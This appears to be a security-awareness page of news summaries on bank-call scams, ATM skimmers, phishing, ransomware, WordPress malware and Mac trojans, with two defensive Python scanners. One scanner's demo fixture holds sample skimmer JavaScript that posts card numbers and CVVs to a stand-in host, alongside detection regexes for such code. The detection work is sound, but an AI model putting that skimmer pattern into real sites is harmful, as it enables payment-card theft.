Inside a scammers’ lair: Ukraine busts 40 in fake bank call-centre raid

It looks like the sort of meeting room you might find in startups all over the world: diffuse lighting from windows down one wall, alongside a giant poster cityscape of New York’s Brooklyn Bridge, with the Manhattan skyline towering behind it.

The difference in this case is that the computer workstations around the room are there for a different sort of “entrepreneurial” venture, and the room is empty not because no one showed up for work, but because the “employees” were in the process of being arrested.

This picture comes from the Ukraine Cyber Police, who raided a fraudulent call centre just before New Year, where they say the three founders of the scam, plus 37 “staff”, were busted for allegedly operating a large-scale banking fraud.

Playbook + gift of gab = scam
You’re probably familiar with the scamming script they’re said to have used, and you probably know friends or family who have been pestered by scammers of this sort.

Some of you may even have acquaintances who were ripped off this way, because these scammers are well versed in gaining the trust of their victims.

Typically, the scammers try to convince you that your bank account is under attack from fraudsters (technically, that part is true – the caller is the attacker), and patiently offer to help you “secure” your account and “recover” lost or at-risk funds.

The scammers aim to turn people’s general awareness of banking scams into an excuse, a reason, a playbook, if you like, for carrying out a scam of their own.

Simply put, they call up pretending to be an official from your own bank, using a variety of tricks to make you accept their fictitious credentials as bank staff, and then “advise” you to take a series of disastrous steps.

The scammers’ first job is to convince you that a hacker has already gained access to your account.

The crooks typically use a mix of threatening, scary and urgent language, combined with the sort of attentiveness that you probably wish more call centre staff would show.

Even if you decide to call them back (don’t do it – you’re only reconnecting to the person who just called you, which proves nothing!), you’ll almost certainly find the scammers more prompt and more helpful than you’ve experienced in a long time when calling a real support line…

…so we’re not surprised that this sort of caller makes some people feel comfortable enough to keep on listening, even if they didn’t believe a word at first.

If in doubt, don’t give it out
As you can imagine, once the crooks know you’re starting to believe their cover story, they’ll start to milk you for personal information, often by pretending that they can see it for themselves on the “banking screen” in front of them, yet somehow always coaxing you to say it out loud first.

At that point, of course, they do know the information you just let slip, and they’ll pretend to “confirm” it or to “double-check” it to keep up the pretence.

There are then many ways that the crooks can defraud you or drain your account.

Sometimes, they may simply convince you to log in on a fake “security” site as they coach you through the process, including getting you to complete any 2FA (two-factor authentication) step, which hands the crooks a freshly authenticated session on the real site.

The Ukrainian call centre that just got busted seems to have worked that way, with victims being “helpfully” guided through the process of “cancelling” transactions that, in fact, never happened in the first place [automated translation]:

[These scammers] called people in Kazakhstan, pretending to be employees of the security service of banks. These people were notified of suspicious transactions and told that alleged outsiders had gained access to their accounts. Under the guise of “cancelling” transactions, victims were persuaded to provide financial data.

After receiving such information, the perpetrators transferred the victims’ money to accounts under their own control. They also issued quick loans and appropriated the loan amounts.

For the conspiracy, the participants used bank accounts located in offshore zones, and cryptocurrency wallets.

In this way, the criminals defrauded [about 18,000 people].

High and dry
In other scams – this approach, unfortunately, is widely reported in the UK – the crooks present you with a brand-new account number, based at the same bank, which they announce is your “replacement account”.

The idea is that you’re being provided with new account details in the same way that if you were to ask for a new credit card due to fraud, it too would have a brand new number, expiry date and so on.

The crooks then convince you to transfer the funds from your “old, hacked” account to this new one, leading you to believe that the account was created by the bank minutes ago, especially for the purpose of “protecting” you from an active attack.

Of course, this “new account” is just a regular account that was opened recently by accomplices of the crooks, perhaps using fraudulent documentation to pass the bank’s know-your-customer (KYC) process.

So the account is already directly under the control of the scammers, and the money will typically be whisked out of that “new” account even before you finish the call.

In cases like this, victims sometimes tragically find themselves left high and dry by their bank, which may claim that because they apparently willingly transferred the funds of their own accord, and properly identified themselves to the online banking system (for example by using 2FA), the funds have technically not been “stolen”, and the bank therefore has no liability.

What to do?
  • Never believe anyone who contacts you out of the blue and claims to be “helping” you with a fraud investigation. That person isn’t stopping a fraud, they are starting one.
  • Never use contact details given to you by the other person when cybersecurity is at stake. This cannot possibly prove anything, given that the details probably came from a scammer in the first place. All you get is a false sense of “security”.
  • Never rely on the Caller ID number that shows up on your phone. The number that appears can easily be faked. If the caller tells you to “check the number if you don’t believe them”, you can be sure they’re a scammer.
  • Never let yourself be talked into handing over personal information, especially not to “prove” your identity. After all, it’s the other person who should be proving themselves to you. Visit your bank in person if you possibly can; if you need to call or interact online, look for contact details printed on something you know you received directly from the bank, such as the back of your payment card or a recent statement.
  • Never transfer funds to another account on someone else’s say-so. Your bank will never call you to ask you to do this, so any call of this sort must be a scam. Worse still, you could find yourself liable for the transfer if you approve it yourself, even if you were tricked into doing so.
  • Look out for friends and family who may be vulnerable. These scammers don’t give up easily, and they can be consummate actors when playing the role of a helpful official. Make sure your friends and family know to hang up right away, and to contact you personally for advice, so they never give the scammers a chance to “vouch” for themselves.

Source: https://nakedsecurity.sophos.com/2023/01/03/inside-a-scammers-lair-ukraine-busts-40-in-fake-bank-call-centre-raid/

Say Hello to Crazy Thin ‘Deep Insert’ ATM Skimmers

A number of financial institutions in and around New York City are dealing with a rash of super-thin “deep insert” skimming devices designed to fit inside the mouth of an ATM’s card acceptance slot. The card skimmers are paired with tiny pinhole cameras that are cleverly disguised as part of the cash machine. Here’s a look at some of the more sophisticated deep insert skimmer technology that fraud investigators have recently found in the wild.

This ultra thin and flexible “deep insert” skimmer recently recovered from an NCR cash machine in New York is about half the height of a U.S. dime. The large yellow rectangle is a battery. Image: KrebsOnSecurity.com.

The insert skimmer pictured above is approximately 0.68 mm tall. This leaves more than enough space to accommodate most payment cards (about 0.54 mm) without interrupting the machine’s ability to grab and return the customer’s card. For comparison, this flexible skimmer is about half the height of a U.S. dime (1.35 mm).

These skimmers do not attempt to siphon chip-card data or transactions, but rather are after the cardholder data still stored in plain text on the magnetic stripe on the back of most payment cards issued to Americans.

Here’s what the other side of that insert skimmer looks like:

The other side of the deep insert skimmer. Image: KrebsOnSecurity.com.

The thieves who designed this skimmer were after the magnetic stripe data and the customer’s 4-digit personal identification number (PIN). With those two pieces of data, the crooks can then clone payment cards and use them to siphon money from victim accounts at other ATMs.

To steal PINs, the fraudsters in this case embedded pinhole cameras in a false panel made to fit snugly over the cash machine enclosure on one side of the PIN pad.

Pinhole cameras were hidden in these false side panels glued to one side of the ATM, and angled toward the PIN pad. Image: KrebsOnSecurity.com.

The skimming devices pictured above were pulled from a brand of ATMs made by NCR called the NCR SelfServ 84 Walk-Up. In January 2022, NCR produced a report on motorized deep insert skimmers, which offers a closer look at other insert skimmers found targeting this same line of ATMs.

Here are some variations on deep insert skimmers NCR found in recent investigations:

Image: NCR.

Image: NCR

The NCR report included additional photos that show how fake ATM side panels with the hidden cameras are carefully crafted to slip over top of the real ATM side panels.

Image: NCR.

Sometimes the skimmer thieves embed their pinhole spy cameras in fake panels directly above the PIN pad, as in these recent attacks targeting a similar NCR model:

Image: NCR

In the image below, the thieves hid their pinhole camera in a “consumer awareness mirror” placed directly above an ATM retrofitted with an insert skimmer:

Image: NCR

The financial institution that shared the images above said it has seen success in stopping most of these insert skimmer attacks by incorporating a solution that NCR sells called an “insert kit,” which it said stops current insert skimmer designs. NCR also is conducting field trials on a “smart detect kit” that adds a standard USB camera to view the internal card reader area, and uses image recognition software to identify any fraudulent device inside the reader.

Skimming devices will continue to mature in miniaturization and stealth as long as payment cards continue to hold cardholder data in plain text on a magnetic stripe. It may seem silly that we’ve spent years rolling out more tamper- and clone-proof chip-based payment cards, only to undermine this advance in the name of backwards compatibility. However, there are a great many smaller businesses in the United States that still rely on being able to swipe the customer’s card.

Many newer ATM models, including the NCR SelfServ referenced throughout this post, now include contactless capability, meaning customers no longer need to insert their ATM card anywhere: They can instead just tap their smart card against the wireless indicator to the left of the card acceptance slot (and right below the “Use Mobile Device Here” sign on the ATM).

For simple ease-of-use reasons, this contactless feature is now increasingly prevalent at drive-thru ATMs. If your payment card supports contactless technology, you will notice a wireless signal icon printed somewhere on the card — most likely on the back. ATMs with contactless capabilities also feature this same wireless icon.

Once you become aware of ATM skimmers, it’s difficult to use a cash machine without also tugging on parts of it to make sure nothing comes off. But the truth is you probably have a better chance of getting physically mugged after withdrawing cash than you do encountering a skimmer in real life.

So keep your wits about you when you’re at the ATM, and avoid dodgy-looking and standalone cash machines in low-lit areas, if possible. When possible, stick to ATMs that are physically installed at a bank. And be especially vigilant when withdrawing cash on the weekends; thieves tend to install skimming devices on Saturdays after business hours — when they know the bank won’t be open again for more than 24 hours.

Lastly, but most importantly, covering the PIN pad with your hand defeats one key component of most skimmer scams: the spy camera that thieves typically hide somewhere on or near the compromised ATM to capture customers entering their PINs.

Shockingly, few people bother to take this simple, effective step. Or at least, that’s what KrebsOnSecurity found in this skimmer tale from 2012, wherein we obtained hours worth of video seized from two ATM skimming operations and saw customer after customer walk up, insert their cards and punch in their digits — all in the clear.

Source: https://krebsonsecurity.com/2022/09/say-hello-to-crazy-thin-deep-insert-atm-skimmers/

Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry

The phishing attacks are spoofing LinkedIn to target ‘Great Resignation’ job hunters, who are also being preyed on by huge data-scraping bot attacks.

Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the “Great Resignation” in full swing, cybercriminals are having an easy time finding their next victim.

Just since Feb. 1, analysts have watched phishing email attacks impersonating LinkedIn surge 232 percent, attempting to trick job seekers into giving up their credentials.

“Current employment trends help to make this attack more convincing,” a new report from Egress said. “‘The Great Resignation’ continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.”

The emails had subject lines that would be enticing to job hunters hoping to get noticed, like, “Who’s searching for you online,” “You appeared in 4 searches this week” or even “You have 1 new message,” the Egress team said.

The phishing emails themselves were convincing dupes, built in HTML templates with the LinkedIn logo, colors and icons, the report added. The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.

Even the email’s footer lifted the company’s headquarters’ address and included “unsubscribe” links to add to the email’s authenticity, the analysts pointed out.

“You can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,” the report said.

Once victims clicked the malicious links in the email, they were directed to a site that harvested their LinkedIn logins and passwords.

“While the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,” the analysts added. “Currently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.”
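The display-name spoofing described in the Egress quotes is easy to check for mechanically: the From: header says “LinkedIn” while the actual address sits on a webmail domain. The following is an added example, not code from Egress, LinkedIn or Threatpost, using only the Python standard library. The allowlist of legitimate LinkedIn sending domains and all the sample addresses are assumptions; a real deployment would populate the allowlist from its own mail logs.

```python
"""
Flag messages whose From: display name claims a brand while the address
belongs to a non-brand domain (webmail or otherwise). Added example; the
BRAND_DOMAINS allowlist is an assumption, not a published LinkedIn list.
"""
import re
from email import message_from_string, policy

# Assumed: brand keyword -> domains that brand is known to send from.
BRAND_DOMAINS = {
    "linkedin": {"linkedin.com"},
}


def _normalize(name: str) -> str:
    """Lower-case and keep only letters/digits so 'Linked In', 'LINKEDIN.'
    and 'LinkedIn' all compare equal."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def _domain_allowed(domain: str, allowed: set) -> bool:
    domain = domain.lower()
    return any(domain == d or domain.endswith("." + d) for d in allowed)


def check_from_header(raw_message: str) -> dict:
    """Verdict for the first From: address of a raw RFC 5322 message.

    verdict is 'spoofed-display-name' (brand claimed, domain not allowed),
    'brand-match' (brand claimed, allowed domain), 'no-brand-claim', or
    'missing-from'. The default policy decodes RFC 2047 encoded-words in
    the display name, so '=?utf-8?q?Linked=20In?=' is handled too.
    """
    msg = message_from_string(raw_message, policy=policy.default)
    header = msg.get("From")
    if header is None or not header.addresses:
        return {"verdict": "missing-from", "display_name": "", "address": ""}
    addr = header.addresses[0]
    result = {"verdict": "no-brand-claim",
              "display_name": addr.display_name,
              "address": addr.addr_spec}
    claimed = _normalize(addr.display_name)
    for brand, domains in BRAND_DOMAINS.items():
        if brand in claimed:
            ok = _domain_allowed(addr.domain, domains)
            result["verdict"] = "brand-match" if ok else "spoofed-display-name"
            result["brand"] = brand
            break
    return result


def triage(messages) -> dict:
    """Group a batch of raw messages by verdict, e.g. for a mailbox sweep."""
    out = {}
    for raw in messages:
        v = check_from_header(raw)
        out.setdefault(v["verdict"], []).append(v["address"])
    return out


# Constructed samples modelled on the subject lines quoted above; every
# address and domain here is made up.
SAMPLES = [
    "From: LinkedIn <linkedin.notifications.4412@gmail.com>\n"
    "Subject: You appeared in 4 searches this week\n\nbody\n",
    "From: =?utf-8?q?Linked=20In?= <who-viewed-you@outlook.com>\n"
    "Subject: Who's searching for you online\n\nbody\n",
    "From: LinkedIn <messages-noreply@linkedin.com>\n"
    "Subject: You have 1 new message\n\nbody\n",
    "From: Alice Example <alice@example.org>\nSubject: lunch?\n\nbody\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(check_from_header(raw))
```

The check deliberately ignores the domain in the display name itself (“LinkedIn <linkedin@gmail.com>” is still a spoof) and does not treat a matching domain as proof of legitimacy: a brand-match verdict only means the claim is not obviously false, and SPF/DKIM/DMARC results on the real message should still decide whether the domain was actually authorised to send it.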

Feb. 17, 2022, 09:18 UPDATE: LinkedIn sent the following statement to Threatpost:

“Our internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on two-step verification. To learn more about how members can identify phishing messages, see our Help Center here.”

Read more: https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/

Hackers infect random WordPress plugins to steal credit cards

Credit card swipers are being injected into random plugins of e-commerce WordPress sites, hiding from detection while stealing customer payment details.

With the Christmas shopping season in full swing, card-stealing threat actors are stepping up their efforts to infect online shops with stealthy skimmers, so administrators ought to remain vigilant.

The latest trend is injecting card skimmers into WordPress plugin files, avoiding the closely monitored ‘wp-admin’ and ‘wp-includes’ core directories, where most injections are short-lived.

According to a new report by Sucuri, hackers performing credit card theft are first hacking into WordPress sites and injecting a backdoor into the website for persistence.

Full article at https://www.bleepingcomputer.com/news/security/hackers-infect-random-wordpress-plugins-to-steal-credit-cards/

Ransomware Payments Explode Amid ‘Quadruple Extortion’

Two reports slap hard figures on what’s already crystal clear: Ransomware attacks have skyrocketed, and ransomware payments are the comet trails that have followed them skyward.

The average ransomware payment spiked 82 percent year over year: It’s now over half a million dollars, according to the first-half 2021 update report put out by Palo Alto Networks’ Unit 42. As far as the sheer multitude of attacks goes, Barracuda researchers on Thursday reported that they’ve identified and analyzed 121 ransomware incidents so far in 2021, a 64 percent increase in attacks, year-over-year.

Obviously, these are just the major incidents. It is unclear from these reports if the threat to small sites or individual consumers’ computers has continued at the same rate as previously now that there are so many attacks occurring against “big payout” targets.

It’s important to continue to be vigilant on all levels: keep backups (both on site and off site, with at least one copy kept offline or otherwise out of reach of an infected machine, and test that they actually restore), be careful about what you click on, watch for phishing and consent phishing, use two-factor authentication where offered, and so on.

Full article at https://threatpost.com/ransomware-payments-quadruple-extortion/168622/

Update: Comedian John Oliver (Last Week Tonight) did a piece on Ransomware on Aug 16. (NSFW, but quite well researched.)

Google: Phishing and malware attacks are evolving

Coronavirus-themed phishing lures are still on the rise, particularly in certain geographic locations – but most are being stopped before they reach your inbox.

Cyber criminals are tailoring coronavirus-related phishing and malware attacks to make them more effective at targeting victims in certain locations around the world, even as attackers continue to distribute millions of malicious spam emails every single day.

Google Cloud has detailed how the past month has seen the emergence of regional hotspots for COVID-19-related cyberattacks, with the UK, India and Brazil all seeing a rise in malware, phishing and spam campaigns looking to exploit fears over the virus.

In each case, the attacks and scams are using regionally relevant lures such as supposed government advice in an effort to reel victims in.

One example targeting people in the UK masquerades as an email from the Small Business Grant Fund, a government initiative to help small businesses get through coronavirus. These attacks, which often involve a malicious file or phishing link, are designed to trick the victim into giving up personal information, as well as financial details.

Full article: https://www.zdnet.com/article/google-heres-how-phishing-and-malware-attacks-are-evolving/

Definition: Fleeceware

Fleeceware: apps which are marketed as “free”, but which then trick the user into subscribing to paid services (often available free elsewhere), frequently for excessive fees.

Common examples are horoscope apps, QR code or barcode scanners, and face-filter apps targeted at younger users. Publishers of fleeceware target users who may be less aware of, or less sensitive to, initial fees and recurring charges.

Often users are hooked by free trials that turn out to be difficult to cancel once the “free” period has lapsed and the subscription charges begin.

These are currently most common on phone apps (both iPhone and Android), but the same techniques can be found with some desktop applications as well.

COVID-19: Hackers Exploit “Fearware” to Target Victims

We’ve all heard about the guy in Tennessee who bought 17,000 bottles of hand sanitizer, then tried to sell them at highly inflated prices.

Some people are going to try to make a buck off anything that happens, without regard to the rest of society. Hackers and scammers are among those people, and they’re playing on COVID-19 fears just as they do with any other opportunity they find.

So it’s no surprise that we’re seeing reports of multiple COVID-19 related scams.

One form of attack involves well-crafted phishing emails that appear to come from health authorities but instead carry malicious software that can steal a person’s data or hijack their device. Be sure that the source is real and that the sender is who they claim to be: check the sending domain rather than just the display name, and go to the authority’s own website instead of following links in the message.

One hacking attack saw Russian-language criminals share an interactive map of coronavirus infections and deaths, which had originally been created by Johns Hopkins University to offer real-time information about the pandemic. Anyone opening the map sent by the hackers would be infected by a form of password-stealing malware that had been hidden within it.

Fake websites, phishing emails, and malware-laden “tools” abound, so be careful where you go and what you open.

https://arstechnica.com/information-technology/2020/03/the-internet-is-drowning-in-covid-19-related-malware-and-phishing-scams/

https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/

https://www.independent.co.uk/life-style/gadgets-and-tech/news/coronavirus-hackers-covid-19-china-fearware-malware-a9400141.html

https://www.darktrace.com/en/blog/how-antigena-email-caught-a-fearware-attack-that-bypassed-the-gateway/

https://www.webarxsecurity.com/covid-19-cyber-attacks/

https://threatpost.com/hackers-hijack-routers-to-spread-malware-via-coronavirus-apps/154170/


Why You Shouldn’t Use Free Versions of Paid Plugins or Themes!

Full article: An inside look at WP-VCD, today’s largest WordPress hacking operation

According to the folks at WordFence, the worst malware threat out there for WordPress sites comes from a series of sites hawking free versions of premium (paid) plugins and themes.  Here’s their basic modus operandi:

They offer compromised plugins and themes for free to unsuspecting webmasters who think they’re getting a great deal.

Those plugins/themes then insert backlinks and otherwise promote the source sites of the hacked goods, improving their search-engine ranking and thus increasing their likelihood of being found, guaranteeing a continuous stream of victims.

They immediately insert malicious code into every other theme installed on the site, so even if the pirated theme isn’t in use, the active theme gets infected too.

So now they have a self-propagating network of infected sites, which they use to serve malicious ads (their income source).

WordPress site owners should keep in mind that when something is free, then “you’re the product” — in this case, your site, which has now been corralled into a cybercrime operation.

See also the original WordFence report.
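Both WordPress items on this page come down to the same defensive problem: code injected into wp-content/plugins (the card skimmers in the Sucuri item) or into every installed theme (WP-VCD) is missed when you only watch the core directories. The following is an added example, not code from Sucuri, Wordfence or the WordPress project, showing the two checks a site owner can run offline: a hash manifest of plugin and theme files taken from a known-clean install, and a small set of heuristic rules for when no baseline exists. The regexes, directory layout and sample files are the author’s assumptions and are constructed for the demo, not real plugin or theme code.

```python
"""
Heuristic scan of a WordPress wp-content tree for injected code: obfuscated
PHP droppers in plugin/theme files and browser-side skimmers that read card
fields and post them elsewhere. Added example; the regexes are assumptions,
not vendor signatures. A hash manifest from a clean install is the stronger
signal; the rules are a fallback when no baseline exists.
"""
import hashlib
import re
import tempfile
from pathlib import Path

SCAN_DIRS = ("wp-content/plugins", "wp-content/themes")
SCAN_EXT = {".php", ".js"}

# Assumed indicators of injected PHP (tune for your own code base).
PHP_RULES = {
    "php-eval-obfuscated": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "php-long-base64-blob": re.compile(r"['\"][A-Za-z0-9+/]{300,}={0,2}['\"]"),
}
# A JS file is flagged only when it BOTH reads card fields AND sends data to an
# absolute URL; either alone is common in legitimate checkout code.
JS_FIELD_READ = re.compile(
    r"(?:card[_-]?number|cvv|cvc|ccnum|exp(?:iry|_month|_year))['\"\]\)]*\s*\.\s*value", re.I)
JS_EXFIL = re.compile(
    r"\b(?:fetch|sendBeacon|XMLHttpRequest|new\s+Image)\b[^;]{0,200}https?://", re.I | re.S)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative POSIX path -> sha256 for every PHP/JS file under the scanned dirs."""
    manifest = {}
    for sub in SCAN_DIRS:
        base = root / sub
        if base.is_dir():
            for p in sorted(base.rglob("*")):
                if p.is_file() and p.suffix in SCAN_EXT:
                    manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def compare_manifest(baseline: dict, current: dict) -> dict:
    """Files that appeared, changed or vanished since the known-clean baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def scan_file(path: Path) -> list:
    """Names of the rules that fire on one file."""
    text = path.read_text(errors="replace")
    if path.suffix == ".php":
        return [name for name, rx in PHP_RULES.items() if rx.search(text)]
    if JS_FIELD_READ.search(text) and JS_EXFIL.search(text):
        return ["js-skimmer-pattern"]
    return []


def scan_tree(root: Path) -> dict:
    """Relative path -> rule hits, for files with at least one hit."""
    findings = {}
    for rel in build_manifest(root):
        hits = scan_file(root / rel)
        if hits:
            findings[rel] = hits
    return findings


# Constructed sample files (not real plugin or theme code) for the demo.
CLEAN_JS = "document.querySelector('#checkout').addEventListener('submit', validate);\n"
SKIMMER_JS = CLEAN_JS + (
    "document.addEventListener('submit', function () {\n"
    "  var d = {n: document.querySelector('#card_number').value,\n"
    "           c: document.querySelector('#cvv').value};\n"
    "  fetch('https://cdn-stats.invalid/collect', {method: 'POST', body: JSON.stringify(d)});\n"
    "});\n")
CLEAN_PHP = "<?php\nadd_action('init', 'theme_setup');\n"
# 'ZWNobyAnaGknOw==' is just base64 for "echo 'hi';", a harmless stand-in.
DROPPER_PHP = CLEAN_PHP + "eval(base64_decode('ZWNobyAnaGknOw=='));\n"


def demo() -> dict:
    """Baseline a clean tree, inject the two samples, and report what is found."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        plugin_js = root / "wp-content/plugins/shop-helper/assets/shop.js"
        active_theme = root / "wp-content/themes/storefront/functions.php"
        spare_theme = root / "wp-content/themes/twentytwentyone/functions.php"
        for p, body in ((plugin_js, CLEAN_JS), (active_theme, CLEAN_PHP),
                        (spare_theme, CLEAN_PHP)):
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        baseline = build_manifest(root)
        clean_hits = scan_tree(root)
        # Injection as described above: a skimmer in a plugin file and a dropper
        # in an unused theme, so nothing touches wp-admin or wp-includes.
        plugin_js.write_text(SKIMMER_JS)
        spare_theme.write_text(DROPPER_PHP)
        return {"clean_hits": clean_hits,
                "diff": compare_manifest(baseline, build_manifest(root)),
                "findings": scan_tree(root)}


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

In practice, build the manifest right after a clean install or update (while the files match the vendor’s distribution), store it off the web server, and re-run the comparison from cron; the regex rules will produce false positives on minified or legitimately obfuscated code, so treat them as triage hints and the manifest diff as the authoritative list of what changed.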

10% of All Macs Shlayered

Many people think that malware only targets Windows and that Macs are safe, but a new report shows how a single piece of macOS malware called Shlayer has attacked over 10% of all Apple computers monitored by an antivirus company.

Instead of distributing the Shlayer Trojan via phishing attacks or through other malware, the threat actors focus on trending events or popular shows and then build fake web sites surrounding them.

Apple users visit these fake sites through search results, links in YouTube videos, and even links in Wikipedia articles. When visiting these sites, instead of being greeted with a video to watch, they are told they need to first update Flash Player.

These “Flash Player updates”, though, are the Shlayer Trojan, and when executed they install a malware cocktail onto the computer.

When browsing the web, if any site states that you must install an update to watch a video or perform an activity, immediately leave that site. (Adobe discontinued Flash Player at the end of 2020, so any prompt to install or update it today is a lie.)

Source:  https://www.bleepingcomputer.com/news/security/10-percent-of-all-macs-shlayered-malware-cocktail-served/

More at: https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/